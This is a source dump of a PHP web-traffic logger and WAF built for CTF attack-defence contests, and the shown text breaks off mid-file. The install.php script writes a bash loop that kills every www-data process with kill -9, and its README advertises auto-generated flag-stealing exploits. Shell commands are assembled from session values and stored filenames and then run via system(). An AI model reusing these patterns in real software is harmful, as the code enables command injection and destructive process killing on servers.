├── ReadME.md ├── data.php ├── index.png ├── install.php ├── managelog.php ├── rm_me.sh ├── temp.php ├── weblogpro.php └── wupco_static ├── .DS_Store ├── css ├── bootstrap.css └── bootstrap.min.css ├── fonts ├── glyphicons-halflings-regular.eot ├── glyphicons-halflings-regular.svg ├── glyphicons-halflings-regular.ttf ├── glyphicons-halflings-regular.woff └── glyphicons-halflings-regular.woff2 └── js ├── bootstrap.js ├── bootstrap.min.js ├── jquery.min.js └── npm.js /ReadME.md: -------------------------------------------------------------------------------- 1 | ## 一个针对php的web流量抓取、分析的应用。 2 | 3 | 可供ctf线下赛使用,也可用于实际场景来抓web流量、分析攻击手段。 4 | 5 | 6 | ![](index.png) 7 | 8 | 目前主要功能如下: 9 | 10 | 1. 完整http报文请求抓取,同时进行对可能存在的攻击进行分类,通过文件存储模拟出数据库,适应各种场合。 11 | 12 | 2. 根据hash判断流量是否重复,只记录次数和最新一次的请求包,减少存储空间的占用以及流量分析的成本。 13 | 14 | 3. 4个waf等级,推荐使用1等级,不会影响应用的正常运行,还可以抵御绝大多数的常见攻击。 15 | 16 | 4. 设置flag获取命令,通过分析页面返回判断是否被读取了flag,从而替换掉flag(有些场合可能无法使用),将此流量标记为危险流量,同时攻击者ip加入黑名单,永 17 | 久ban掉(可从黑名单去除)。 18 | 19 | 5. 黑白名单模式,可以手动添加,选择白名单模式,则服务正常通过给白名单机器,其他机器全部拦截。 20 | 21 | 6. 可根据ip、时间筛选出想要查看的对应日志。 22 | 23 | 7. 通过分析是否为危险流量,统计相同流量出现次数,显示出最可能是最终payload的流量排行。 24 | 25 | 8. 一键生成ctf线下赛exp(获取flag+自动提交flag),快人一步进行攻击(除了正常攻击流量外,exp中还包含大量垃圾混淆流量) 26 | 27 | 9. 删除并压缩备份选中的流量。 28 | 29 | 9. 因流量转发太过不公平,不考虑添加。 30 | 31 | 32 | ## 使用方法: 33 | 34 | ``` 35 |   cd /var/www/html/ (or other web dir) 36 | 37 | git clone https://github.com/wupco/weblogger.git 38 | 39 | chmod -R 777 weblogger/ 40 | 41 |   open http://xxxxx/weblogger/install.php in Web browser 42 | 43 | install it 44 | 45 | 46 | 47 | ``` 48 | 更详细说明和帮助: 49 | https://gist.github.com/wupco/ee26f88656fbf36d014f49b4ac47ddc8 50 | 51 | 52 | ## 说明: 53 | 54 | weblogger 分为静态文件群和动态文件群: 55 | 56 | 动态文件群: 57 | - 所有流量数据与脚本模板均存储在tmp目录下,所以要保证tmp目录的持续可写。 58 | 59 | 静态文件群: 60 | - web管理页面存在web目录下的一个新建文件中,所以要保证web目录的可写(待install.php生成管理文件结束后可设置目录不可写) 61 | -------------------------------------------------------------------------------- /data.php: -------------------------------------------------------------------------------- 1 | eAccelerator = function_exists("eaccelerator_lock"); 35 | $this->salt = "wupco123"; 36 | } 37 | 38 | public function readfile($path,$type) 39 | { 40 | 41 | $file = fopen($this->data_root_dir.$path,"r"); 42 | if(!$file) 43 | return 0; 44 | 45 | if (flock($file,1)) 46 | { 47 | switch ($type) { 48 | 49 | case 'JSONA': 50 | $filearr = array(); 51 | while(!feof($file)) 52 | { 53 | $line = fgets($file); 54 | if($line === false) 55 | break; 56 | else 57 | array_push($filearr,$line); 58 | } 59 | $filestr = json_encode($filearr); 60 | break; 61 | 62 | case 'JSONCSV': 63 | $filearr = array(); 64 | while(! feof($file)) 65 | { 66 | $line = fgetcsv($file,0,chr(0)); 67 | if($line === false) 68 | break; 69 | else 70 | array_push($filearr,$line); 71 | } 72 | $filestr = json_encode($filearr); 73 | break; 74 | 75 | default: 76 | //echo $this->data_root_dir.$path; 77 | $filestr = fread($file,filesize($this->data_root_dir.$path)); 78 | break; 79 | } 80 | 81 | flock($file,3); 82 | fclose($file); 83 | return $filestr; 84 | } 85 | else 86 | { 87 | fclose($file); 88 | return -1; 89 | } 90 | 91 | 92 | 93 | } 94 | 95 | public function writefile($path,$action,$type,$content) 96 | { 97 | $file = fopen($this->data_root_dir.$path,$action); 98 | if(!$file) 99 | return 0; 100 | 101 | if (flock($file,2)) 102 | { 103 | switch ($type) { 104 | case 'CSV': 105 | fputcsv($file,$content,chr(0)); 106 | //var_dump($content); 107 | break; 108 | 109 | default: 110 | fwrite($file,$content); 111 | break; 112 | } 113 | flock($file,3); 114 | fclose($file); 115 | } 116 | else 117 | { 118 | fclose($file); 119 | return -1; 120 | } 121 | 122 | 123 | } 124 | 125 | 126 | private function getindex() 127 | { 128 | if($i_data = $this->readfile('dataindex.exe','JSONCSV')) 129 | { 130 | 131 | $i_data = json_decode($i_data); 132 | $alldata = array(); 133 | foreach($i_data as $line) 134 | { 135 | //var_dump($line); 136 | $data = array("IP"=>$line[0],"DIR"=>$line[1],"LAST_TIME"=>$line[2],"IS_DANGER"=>$line[3],"LAST_ID"=>$line[4]); 137 | //array_push($alldata,$data); 138 | $alldata[$line[0]] = $data; 139 | } 140 | return json_encode($alldata); 141 | } 142 | else 143 | { 144 | return 0; 145 | } 146 | } 147 | 148 | private function writeindex($indexjson) 149 | { 150 | $index = json_decode($indexjson); 151 | $this->writefile('dataindex.exe','w','',''); 152 | foreach($index as $ip=>$data) 153 | { 154 | $data = $data; 155 | $arr = array($data->IP,$data->DIR,$data->LAST_TIME,$data->IS_DANGER,$data->LAST_ID); 156 | // var_dump($arr); 157 | //$a->writefile('dataindex','a','CSV',$b); 158 | $this->writefile('dataindex.exe','a','CSV',$arr); 159 | } 160 | //var_dump($this->getindex()); 161 | return 0; 162 | } 163 | 164 | private function lock($name) 165 | { 166 | if(!$this->eAccelerator) 167 | { 168 | $this->fp = fopen($this->path.$name, 'w+'); 169 | if($this->fp === false) 170 | { 171 | return false; 172 | } 173 | return flock($this->fp, LOCK_EX); 174 | } 175 | else 176 | { 177 | return eaccelerator_lock($name); 178 | } 179 | 180 | } 181 | 182 | private function unlock($name) 183 | { 184 | if(!$this->eAccelerator) 185 | { 186 | if($this->fp !== false) 187 | { 188 | flock($this->fp, LOCK_UN); 189 | clearstatcache(); 190 | } 191 | fclose($this->fp); 192 | } 193 | else 194 | { 195 | return eaccelerator_unlock($name); 196 | } 197 | } 198 | 199 | public function create() 200 | { 201 | if (!file_exists($this->data_root_dir)) 202 | { 203 | echo "Please first Create data-dir"; 204 | return -1; 205 | } 206 | else 207 | { 208 | file_put_contents($this->data_root_dir."dataindex.exe",""); 209 | file_put_contents($this->data_root_dir."id.jpg","-1"); 210 | mkdir($this->data_root_dir."lock/", 0777, true); 211 | return 1; 212 | } 213 | 214 | } 215 | 216 | public function insert($data) 217 | { 218 | $this->lock('index'); 219 | $index = json_decode($this->getindex(),true); 220 | $data = json_decode($data,true); 221 | //var_dump($index); 222 | //var_dump($this->getindex()); 223 | $lastid = (int)($this->readfile('id.jpg','')); 224 | //echo $lastid; 225 | 226 | if(!array_key_exists($data['ip'],(array)$index)) 227 | { 228 | $ipdir = md5($data['ip'].$this->salt.((string)time())); 229 | mkdir($this->data_root_dir.$ipdir."/", 0777, true); 230 | mkdir($this->data_root_dir.$ipdir."/payload/", 0777, true); 231 | mkdir($this->data_root_dir.$ipdir."/danger/", 0777, true); 232 | $dir = $ipdir; 233 | 234 | $lasttime = (string)time(); 235 | $is_danger = $data['risk']; 236 | @$index[$data['ip']]['DIR']= $dir; 237 | @$index[$data['ip']]['LAST_ID'] = 0; 238 | @$index[$data['ip']]['LAST_TIME'] = $lasttime; 239 | @$index[$data['ip']]['IS_DANGER'] = $is_danger; 240 | @$index[$data['ip']]['IP'] = $data['ip']; 241 | } 242 | else 243 | { 244 | $dir = $index[$data['ip']]['DIR']; 245 | $lasttime = $index[$data['ip']]['LAST_TIME']; 246 | $is_danger = $index[$data['ip']]['IS_DANGER']; 247 | } 248 | 249 | 250 | if(file_exists($this->data_root_dir.$dir."/payload/".bin2hex($data['file'])."/".md5($data['payload']))) 251 | { 252 | $filename = $this->readfile($dir."/payload/".bin2hex($data['file'])."/".md5($data['payload']),''); 253 | if($filename) 254 | { 255 | $file = $this->readfile($dir."/".$filename,'JSONCSV'); 256 | if($file) 257 | { 258 | $file = json_decode($file); 259 | foreach($file as $line) 260 | { 261 | $id = $line[0]; 262 | $risk = $line[8]; 263 | $count = $line[11]+1; 264 | $f_link = $line[10]; 265 | } 266 | unlink($this->data_root_dir.$dir."/".$filename); 267 | $id = explode("_", $filename); 268 | $id = $id[1]; 269 | $newname = (string)time()."_".(string)$id."_".(string)$count; 270 | $wd = array($id,$data['url'],$data['poststr'],$data['getstr'],$data['cookie'],$data['time'],$data['headers'],$data['ip'],$risk,$data['type'],$f_link,$count); 271 | $this->writefile($dir."/".$newname,'w','CSV',$wd); 272 | $this->writefile($dir."/payload/".bin2hex($data['file'])."/".md5($data['payload']),'w','',$newname); 273 | if((int)$risk == 1) 274 | { 275 | unlink($this->data_root_dir.$dir."/danger/".$filename); 276 | $this->writefile($dir."/danger/".$newname,'w','',''); 277 | } 278 | $baknum = -1; 279 | 280 | } 281 | else 282 | $baknum = -2; 283 | 284 | } 285 | else 286 | $baknum = -3; 287 | //$payloads = $this->readfile($this->data_root_dir.$dir."/payload/".$data['file']),'JSONA'); 288 | 289 | } 290 | else 291 | { 292 | 293 | if(!file_exists($this->data_root_dir.$dir."/payload/".bin2hex($data['file'])."/")) 294 | mkdir($this->data_root_dir.$dir."/payload/".bin2hex($data['file'])."/", 0777, true); 295 | $newid = ((int)$lastid) + 1; 296 | //echo $newid; 297 | $newfile = (string)time() . "_" . (string)$newid."_0"; 298 | $f_link = $this->data_root_dir.$dir."/payload/".bin2hex($data['file'])."/".md5($data['payload']); 299 | $wd = array($newid,$data['url'],$data['poststr'],$data['getstr'],$data['cookie'],$data['time'],$data['headers'],$data['ip'],$data['risk'],$data['type'],$f_link,0); 300 | $this->writefile($dir."/".$newfile,'w','CSV',$wd); 301 | $this->writefile($dir."/payload/".bin2hex($data['file'])."/".md5($data['payload']),'w','',$newfile); 302 | $this->writefile('id.jpg','w','',(string)$newid); 303 | @$index[$data['ip']]['LAST_ID'] = (string)$newid; 304 | 305 | $baknum = $newid; 306 | //$index[$data['ip']]['LAST_TIME'] = (string)time(); 307 | } 308 | $this->writeindex(json_encode($index)); 309 | //var_dump($index); 310 | //echo $this->getindex(); 311 | $this->unlock('index'); 312 | return $baknum; 313 | 314 | } 315 | 316 | public function ip_list() 317 | { 318 | $index = json_decode($this->getindex()); 319 | if(is_array($index)) 320 | { 321 | if(size($index)==0) 322 | return 0; 323 | else 324 | return -1; 325 | } 326 | else 327 | { 328 | $ip_list = json_encode(array_keys(get_object_vars($index))); 329 | return $ip_list; 330 | } 331 | } 332 | public function select_by_ip($ip,$limit,$desc,$start,$getnum,$time) 333 | { 334 | $index = json_decode($this->getindex()); 335 | //print_r( $index; 336 | if(is_array($index)) 337 | { 338 | if(sizeof($index)==0) 339 | return 0; 340 | else 341 | return -1; 342 | } 343 | else 344 | { 345 | //$dir_list = array(); 346 | $index = json_decode(json_encode($index),true); 347 | $dir = $index[$ip]['DIR']; 348 | if($time===0){ 349 | $filenames = scandir($this->data_root_dir.$dir); 350 | array_splice($filenames, 0, 2); 351 | array_splice($filenames, -2, 2); 352 | } 353 | else{ 354 | $filenames = glob($this->data_root_dir.$dir.'/'.$time.'*'); 355 | array_walk($filenames,"this_sAlt_get_baSe_nAme"); 356 | 357 | } 358 | if($getnum) 359 | { 360 | return sizeof($filenames); 361 | } 362 | 363 | if($limit == -1) 364 | { 365 | $limit = sizeof($filenames); 366 | } 367 | if(sizeof($filenames)<$limit+$start) 368 | { 369 | $limit = sizeof($filenames) -$start; 370 | } 371 | if($desc === 1) 372 | 373 | rsort($filenames); 374 | 375 | else 376 | sort($filenames); 377 | //var_dump($filenames); 378 | $mess = array(); 379 | 380 | for($i=$start;$i<$limit+$start;$i++) 381 | { 382 | 383 | $c = json_decode($this->readfile($dir."/".$filenames[$i],"JSONCSV")); 384 | array_push($mess,$c); 385 | } 386 | return json_encode($mess); 387 | 388 | } 389 | } 390 | private function dir_list() 391 | { 392 | $index = json_decode($this->getindex()); 393 | //print_r( $index); 394 | if(is_array($index)) 395 | { 396 | if(sizeof($index)==0) 397 | return 0; 398 | else 399 | return -1; 400 | } 401 | else 402 | { 403 | $dir_list = array(); 404 | foreach($index as $ip=>$data) 405 | { 406 | array_push($dir_list,$data->DIR); 407 | } 408 | return json_encode($dir_list); 409 | } 410 | } 411 | 412 | 413 | 414 | public function select_list($order,$limit,$jback,$desc,$getnum,$start,$time) 415 | { 416 | $dir_list = $this->dir_list(); 417 | //print $dir_list; 418 | if($dir_list) 419 | { 420 | $dir_list = json_decode($dir_list); 421 | $filename = array(); 422 | 423 | //var_dump($dir_list); 424 | foreach($dir_list as $dir) 425 | { 426 | //echo $this->data_root_dir; 427 | if($time===0){ 428 | $filenames = scandir($this->data_root_dir.$dir); 429 | array_splice($filenames, 0, 2); 430 | array_splice($filenames, -2, 2); 431 | } 432 | else{ 433 | $filenames = glob($this->data_root_dir.$dir.'/'.$time.'*'); 434 | array_walk($filenames,"this_sAlt_get_baSe_nAme"); 435 | 436 | 437 | } 438 | //echo $this->data_root_dir.$dir."
"; 439 | //echo $dir; 440 | //var_dump($filenames); 441 | //$key = array_search('.', $filenames); 442 | //if ($key !== false) 443 | 444 | switch ($order) { 445 | case 'count': 446 | array_walk($filenames,"this_sAlt_order_B_coUnt",$dir); 447 | break; 448 | case 'id': 449 | array_walk($filenames,"this_sAlt_order_B_iD",$dir); 450 | break; 451 | default: 452 | array_walk($filenames,"this_sAlt_add_PrE",$dir); 453 | break; 454 | } 455 | 456 | 457 | 458 | //array_push($filename,$filenames); 459 | $filename = array_merge($filename,$filenames); 460 | //$key = array_search('.', $filenames); 461 | 462 | } 463 | if($getnum) 464 | { 465 | return sizeof($filename); 466 | } 467 | if($limit == -1) 468 | { 469 | $limit = sizeof($filename); 470 | } 471 | if(sizeof($filename)<$limit+$start) 472 | { 473 | $limit = sizeof($filename) - $start; 474 | } 475 | if($desc === 1) 476 | 477 | rsort($filename); 478 | 479 | else 480 | sort($filename); 481 | //var_dump($filename); 482 | if($jback === 'content') 483 | { 484 | 485 | $mess = array(); 486 | //var_dump($filename); 487 | //print $limit; 488 | //print sizeof($filename); 489 | // 490 | //echo $start; 491 | for($i=$start;$i<$limit+$start;$i++) 492 | { 493 | //echo $filename[$i]; 494 | $tmp = explode("_",$filename[$i]); 495 | //var_dump($tmp); 496 | $d = $tmp[4]; 497 | $f = $tmp[1]."_".$tmp[2]."_".$tmp[3]; 498 | $c = json_decode($this->readfile($d."/".$f,"JSONCSV")); 499 | array_push($mess,$c); 500 | } 501 | return json_encode($mess); 502 | } 503 | elseif($jback === 'count_suff') 504 | { 505 | return json_encode($filename); 506 | } 507 | else 508 | { 509 | 510 | $limitfile = array(); 511 | for($i=$start;$i<$limit;$i++) 512 | { 513 | $tmp = explode("_",$filename[$i]); 514 | $d = $tmp[4]; 515 | $f = $tmp[1]."_".$tmp[2]."_".$tmp[3]; 516 | array_push($limitfile,$d."/".$f); 517 | } 518 | return json_encode($limitfile); 519 | } 520 | 521 | } 522 | else 523 | { 524 | return -2; 525 | } 526 | //echo $this->dir_list(); 527 | } 528 | 529 | 530 | 531 | public function get_num($mod,$group,$time) 532 | { 533 | $time = $time; 534 | switch ($mod) { 535 | case 'all': 536 | return $this->select_list('',-1,'',1,1,0,$time); 537 | break; 538 | case 'risk': 539 | return $this->prob_payload(-1,1,1,0); 540 | break; 541 | case 'more': 542 | return $this->prob_payload(-1,1,0,0); 543 | break; 544 | case 'ip': 545 | return $this->select_by_ip($group,-1,1,0,1,$time); 546 | default: 547 | return 0; 548 | break; 549 | } 550 | 551 | } 552 | 553 | public function select_by_id($id) 554 | { 555 | //print $id; 556 | $bak = $this->select_list('id',$id+1,'1',0,0,0,0); 557 | // print $bak; 558 | if($bak) 559 | { 560 | $bak = json_decode($bak,true); 561 | if(sizeof($bak)>0) 562 | { 563 | return $bak[sizeof($bak)-1]; 564 | //var_dump($bak); 565 | } 566 | else 567 | return -1; 568 | } 569 | else 570 | return 0; 571 | 572 | } 573 | 574 | 575 | 576 | public function danger_list() 577 | { 578 | $dir_list = $this->dir_list(); 579 | if($dir_list) 580 | { 581 | $dir_list = json_decode($dir_list); 582 | $filename = array(); 583 | foreach($dir_list as $dir) 584 | { 585 | $filenames = scandir($this->data_root_dir.$dir.'/danger'); 586 | array_splice($filenames, 0, 2); 587 | array_walk($filenames,"this_sAlt_order_B_coUnt",$dir); 588 | $filename = array_merge($filename,$filenames); 589 | } 590 | rsort($filename); 591 | return json_encode($filename); 592 | } 593 | else 594 | return -1; 595 | } 596 | 597 | public function prob_payload($limit,$getnum,$onlydanger,$start) 598 | { 599 | $danger = $this->danger_list(); 600 | if($danger) 601 | { 602 | $danger = json_decode($danger,true); 603 | if($onlydanger) 604 | $count = json_encode(array()); 605 | else 606 | $count = $this->select_list('count',-1,'count_suff',1,0,0,0); 607 | if($count) 608 | { 609 | $count = json_decode($count,true); 610 | $all = array_merge($danger,$count); 611 | $alllist = array(); 612 | $alllist = array_values(array_unique($all)); 613 | if($getnum) 614 | return sizeof($alllist); 615 | if(sizeof($alllist)<$limit+$start) 616 | { 617 | $limit = sizeof($alllist) - $start; 618 | } 619 | $mess = array(); 620 | 621 | for($i=$start;$i<$limit+$start;$i++) 622 | { 623 | $tmp = explode("_",$alllist[$i]); 624 | $d = $tmp[4]; 625 | $f = $tmp[1]."_".$tmp[2]."_".$tmp[3]; 626 | $c = json_decode($this->readfile($d."/".$f,"JSONCSV"),true); 627 | array_push($mess,$c); 628 | } 629 | // $bjson = array("allnum"=>$num,$mess); 630 | return json_encode($mess); 631 | 632 | } 633 | else 634 | return -1; 635 | 636 | 637 | } 638 | else 639 | return -2; 640 | } 641 | 642 | public function get_content_by_id($id) 643 | { 644 | $filename = $this->select_by_id($id); 645 | if($filename) 646 | { 647 | $content = $this->readfile($filename,'JSONCSV'); 648 | if($content) 649 | { 650 | return $content; 651 | 652 | } 653 | else 654 | { 655 | return 0; 656 | } 657 | } 658 | else 659 | return -1; 660 | } 661 | 662 | public function del_by_id($id) 663 | { 664 | $filename = $this->select_by_id($id); 665 | if($filename) 666 | { 667 | $content = $this->readfile($filename,'JSONCSV'); 668 | if($content) 669 | { 670 | $content = json_decode($content, true); 671 | $f_link = $content[0][10]; 672 | if($f_link) 673 | { 674 | $f_link = explode(' ', $f_link); 675 | foreach ($f_link as $file_l) 676 | { 677 | if(file_exists($file_l)){ 678 | file_put_contents($this->data_root_dir.'../tarlog.sh','tar -rvf '.$this->data_root_dir.'/logbak.tar.bz2 '.$file_l."\n"); 679 | file_put_contents($this->data_root_dir.'../tarlog.sh','rm '.$file_l."\n",FILE_APPEND); 680 | file_put_contents($this->data_root_dir.'../tarlog.sh','chmod 777 '.$this->data_root_dir.'/logbak.tar.bz2',FILE_APPEND); 681 | 682 | 683 | } 684 | 685 | } 686 | if(file_exists($this->data_root_dir.$filename)) { 687 | file_put_contents($this->data_root_dir.'../tarlog.sh','tar -rvf '.$this->data_root_dir.'/logbak.tar.bz2 '.$this->data_root_dir.$filename."\n",FILE_APPEND); 688 | file_put_contents($this->data_root_dir.'../tarlog.sh','rm '.$this->data_root_dir.$filename."\n",FILE_APPEND); 689 | file_put_contents($this->data_root_dir.'../tarlog.sh','chmod 777 '.$this->data_root_dir.'/logbak.tar.bz2',FILE_APPEND); 690 | system('bash '.$this->data_root_dir.'../tarlog.sh'); 691 | 692 | 693 | } 694 | return 1; 695 | } 696 | else 697 | { 698 | if(file_exists($this->data_root_dir.$filename)){ 699 | file_put_contents($this->data_root_dir.'../tarlog.sh','tar -rvf '.$this->data_root_dir.'/logbak.tar.bz2 '.$this->data_root_dir.$filename."\n"); 700 | file_put_contents($this->data_root_dir.'../tarlog.sh','rm '.$this->data_root_dir.$filename."\n",FILE_APPEND); 701 | file_put_contents($this->data_root_dir.'../tarlog.sh','chmod 777 '.$this->data_root_dir.'/logbak.tar.bz2',FILE_APPEND); 702 | system('bash '.$this->data_root_dir.'../tarlog.sh'); 703 | 704 | } 705 | return 1; 706 | } 707 | 708 | 709 | } 710 | else 711 | { 712 | return 0; 713 | } 714 | 715 | } 716 | else 717 | return -1; 718 | } 719 | 720 | public function upadate_risk($id) 721 | { 722 | $filename = $this->select_by_id($id); 723 | //echo $filename; 724 | echo "\n".$id."\n"; 725 | if($filename) 726 | { 727 | $content = $this->readfile($filename,'JSONCSV'); 728 | if($content) 729 | { 730 | $content = json_decode($content,true); 731 | $content[0][8] = 1; 732 | $risk_ip = $content[0][7]; 733 | $this->writefile($filename,'w',"CSV",$content[0]); 734 | $index = $this->getindex(); 735 | if($index) 736 | { 737 | $tmp = explode("/",$filename); 738 | $index = json_decode($index,true); 739 | //var_dump($index); 740 | $index[$risk_ip]['IS_DANGER'] = 1; 741 | $dir = $index[$risk_ip]['DIR']; 742 | $this->writeindex(json_encode($index)); 743 | $content[0][11] = $content[0][11].' '.$this->data_root_dir.$dir."/danger/".$tmp[1]; 744 | $this->writefile($filename,'w',"CSV",$content[0]); 745 | $this->writefile($dir."/danger/".$tmp[1],'w','',''); 746 | return 1; 747 | } 748 | else 749 | { 750 | return $index; 751 | } 752 | } 753 | else 754 | { 755 | return $content; 756 | } 757 | } 758 | else 759 | { 760 | //echo "sss"; 761 | return 0; 762 | } 763 | } 764 | 765 | 766 | 767 | } 768 | 769 | //$a = new SaLt_Classsssss_LogDb_HHHHhhhhh(); 770 | 771 | //$a->create(); 772 | // $wd = array($data['url'],$data['poststr'],$data['getstr'],$data['cookie'],$data['time'],$data['headers'],$data['ip'],$risk,$data['type'],$count); 773 | //$payload = $_GET['id']; 774 | //$b = array("url"=>"www.baidu.com","poststr"=>"t=post","getstr"=>"t=get","cookie"=>"t=cookie","time"=>"2014-2-10","headers"=>"asdasd\ndasdsdas","ip"=>"127.0.0.8","risk"=>"0","type"=>"0","file"=>"index.php","payload"=>$payload); 775 | //print $a->('id',5,'content',0); 776 | //$a->insert(json_encode($b)); 777 | //echo $a->upadate_risk(3); 778 | //var_dump($a->readfile('7d968c105afd8c49b52ef42266675f2d/1494994152_5_0','JSONCSV')); 779 | ?> 780 | -------------------------------------------------------------------------------- /index.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wupco/weblogger/aac6160771e8d33fb89f0ae633b6887cf36d312a/index.png -------------------------------------------------------------------------------- /install.php: -------------------------------------------------------------------------------- 1 | 44 | 输入数据存储路径:
45 | 输入web根目录:
46 | 47 | "; 48 | if(isset($_POST['datadir'])&& isset($_POST['webdir'])) 49 | { 50 | $_SESSION['datadir'] = $_POST['datadir']; 51 | $_SESSION['webdir'] = $_POST['webdir']; 52 | $_SESSION['step'] = 1; 53 | echo ""; 54 | 55 | } 56 | 57 | } 58 | elseif($_SESSION['step'] === 1) 59 | { 60 | $data_base_dir = _m_khashdir($_SESSION['datadir']); 61 | $_SESSION['databasedir'] = $data_base_dir; 62 | $web_base_dir = _m_khashdir($_SESSION['webdir']); 63 | $web_com_dir = str_replace($_SESSION['webdir'],'',$web_base_dir); 64 | $_SESSION['webcomdir'] = $web_com_dir; 65 | $_SESSION['webbasedir']= $web_base_dir; 66 | $_SESSION['step'] = 2; 67 | echo ""; 68 | } 69 | elseif($_SESSION['step'] === 2) 70 | { 71 | echo "
72 | 输入可以获取flag的bash命令:
73 | 输入管理账号:
74 | 输入管理密码:
75 | 76 |
77 | "; 78 | if(isset($_POST['username'])&&isset($_POST['passwd'])&&isset($_POST['getflagshell'])) 79 | { 80 | $_SESSION['username'] = $_POST['username']; 81 | $_SESSION['passwd'] = $_POST['passwd']; 82 | $_SESSION['getflagshell'] = $_POST['getflagshell']; 83 | $_SESSION['filesalt'] = getrandhash(); 84 | $_SESSION['prvkey'] = getrandhash(); 85 | $_SESSION['step'] = 3; 86 | echo ""; 87 | } 88 | } 89 | elseif($_SESSION['step'] === 3) 90 | { 91 | $weblogpro = file_get_contents('weblogpro.php'); 92 | $weblogpro = rep_weblogpro($weblogpro); 93 | file_put_contents($_SESSION['databasedir'].'weblogpro.php',$weblogpro); 94 | echo "weblogpro.php create ok \n"; 95 | system('mv data.php '.$_SESSION['databasedir'].'data.php'); 96 | system('mv temp.php '.$_SESSION['databasedir'].'temp.php'); 97 | system('mv wupco_static '.$_SESSION['webbasedir'].'/wupco_static'); 98 | $_SESSION['managedir'] = $_SESSION['webbasedir'].getrandhash().'/'; 99 | mkdir($_SESSION['managedir'], 0777, true); 100 | $manage = file_get_contents('managelog.php'); 101 | $manage = rep_manage($manage); 102 | file_put_contents($_SESSION['managedir'].'managelog.php',$manage); 103 | $_SESSION['step'] = 4; 104 | echo "file moved ok \n"; 105 | echo ""; 106 | } 107 | elseif ($_SESSION['step'] === 4) 108 | { 109 | require_once($_SESSION['databasedir'].'weblogpro.php'); 110 | $_SESSION['step'] = 5; 111 | $killer = "while true\ndo\n ps aux | grep 'www-data'|grep -v $$|awk '{print $2}'|xargs kill -9\nsleep 0.1\ndone"; 112 | $killername = $_SESSION['databasedir'].getrandhash().'.sh'; 113 | file_put_contents($killername,$killer); 114 | $killerphp = ""; 115 | $killerphpname = $_SESSION['managedir'].'killer.php'; 116 | file_put_contents($killerphpname,$killerphp); 117 | file_put_contents($_SESSION['databasedir'].'tarlog.sh',""); 118 | system('chmod -R 555 '.$_SESSION['webbasedir']); 119 | echo ""; 120 | } 121 | elseif ($_SESSION['step'] === 5) 122 | { 123 | require_once($_SESSION['databasedir'].'weblogpro.php'); 124 | $_SESSION['step'] = 6; 125 | echo ("all ok! please include ".$_SESSION['databasedir']."weblogpro.php
managepath : ".$_SESSION['managedir'].'managelog.php'); 126 | session_unset(); 127 | session_destroy(); 128 | system('sh rm_me.sh'); 129 | exit(); 130 | } 131 | 132 | -------------------------------------------------------------------------------- /managelog.php: -------------------------------------------------------------------------------- 1 | data_root_dir = BASE_PATH; 11 | $this->path = $this->data_root_dir.'lock/'; 12 | } 13 | } 14 | session_start(); 15 | function dumpalllog($start,$num,$desc,$time) 16 | { 17 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 18 | if(!$this_SalT_hhhaaaa_Db_p){ 19 | $back = array("code"=>"500","message","open db error"); 20 | return json_encode($back); 21 | } 22 | 23 | //$sql = 'SELECT * from LOGGERS order by Time '.$desc.' limit '.(int)$start.','.(int)$num; 24 | /*URL,PostStr,GetStr,Cookie,Time,headers,Ip,risk,type)*/ 25 | //$this_SalT_hhhaaaa_ReT_p = $this_SalT_hhhaaaa_Db_p->query($sql); 26 | //$back = array(); 27 | // $wd = array(id,$data['url'],$data['poststr'],$data['getstr'],$data['cookie'],$data['time'],$data['headers'],$data['ip'],$risk,$data['type'],$count); 28 | $all = $this_SalT_hhhaaaa_Db_p -> select_list('',$num,'content',$desc,0,$start,$time); 29 | if($all) 30 | { 31 | $all = json_decode($all,true); 32 | 33 | $back = array(); 34 | foreach($all as $row) 35 | { 36 | $row = $row[0]; 37 | $arr = array("id"=>$row[0],"url"=>$row[1],"post"=>$row[2],"get"=>$row[3],"cookie"=>$row[4],"time"=>$row[5],"headers"=>$row[6],"ip"=>$row[7],"risk"=>(int)$row[8],"type"=>(int)$row[9],"count"=>(int)$row[11]); 38 | //var_dump($arr); 39 | array_push($back, $arr); 40 | } 41 | $alback = array("code"=>"200","message"=>$back); 42 | return json_encode($alback); 43 | } 44 | else 45 | { 46 | $alback = array("code"=>"501","message"=>"select data error"); 47 | return json_encode($alback); 48 | } 49 | 50 | } 51 | 52 | function getbysth($where,$start,$num,$desc,$sth,$time) 53 | { 54 | $time = $time; 55 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 56 | if(!$this_SalT_hhhaaaa_Db_p){ 57 | $back = array("code"=>"500","message","open db error"); 58 | return json_encode($back); 59 | } 60 | switch ($where) 61 | { 62 | case 'ip': 63 | $dataj = $this_SalT_hhhaaaa_Db_p->select_by_ip($sth,$num,$desc,$start,0,$time); 64 | break; 65 | case 'more': 66 | $dataj = $this_SalT_hhhaaaa_Db_p->prob_payload($num,0,0,$start); 67 | break; 68 | case 'risk': 69 | $dataj = $this_SalT_hhhaaaa_Db_p->prob_payload($num,0,1,$start); 70 | break; 71 | default: 72 | $dataj = 0; 73 | break; 74 | } 75 | if($dataj) 76 | { 77 | $dataj = json_decode($dataj,true); 78 | $back = array(); 79 | foreach($dataj as $row) 80 | { 81 | $row = $row[0]; 82 | $arr = array("id"=>$row[0],"url"=>$row[1],"post"=>$row[2],"get"=>$row[3],"cookie"=>$row[4],"time"=>$row[5],"headers"=>$row[6],"ip"=>$row[7],"risk"=>(int)$row[8],"type"=>(int)$row[9],"count"=>(int)$row[11]); 83 | array_push($back, $arr); 84 | } 85 | 86 | $alback = array("code"=>"200","message"=>$back); 87 | return json_encode($alback); 88 | } 89 | else 90 | { 91 | $alback = array("code"=>"501","message"=>"select data error"); 92 | return json_encode($alback); 93 | 94 | } 95 | //$all = $this_SalT_hhhaaaa_Db_p -> select_list('',$num,'content',$desc,0,$start); 96 | // $sql = 'SELECT * from LOGGERS '.$where; 97 | // $this_SalT_hhhaaaa_ReT_p = $this_SalT_hhhaaaa_Db_p->query($sql); 98 | 99 | } 100 | function getnum($mod,$group,$time) 101 | { 102 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 103 | if(!$this_SalT_hhhaaaa_Db_p){ 104 | $back = array("code"=>"500","message","open db error"); 105 | return json_encode($back); 106 | } 107 | $Row = $this_SalT_hhhaaaa_Db_p->get_num($mod,$group,$time); 108 | $alback = array("code"=>"200","message"=>$Row); 109 | return json_encode($alback); 110 | } 111 | function getIPlist() 112 | { 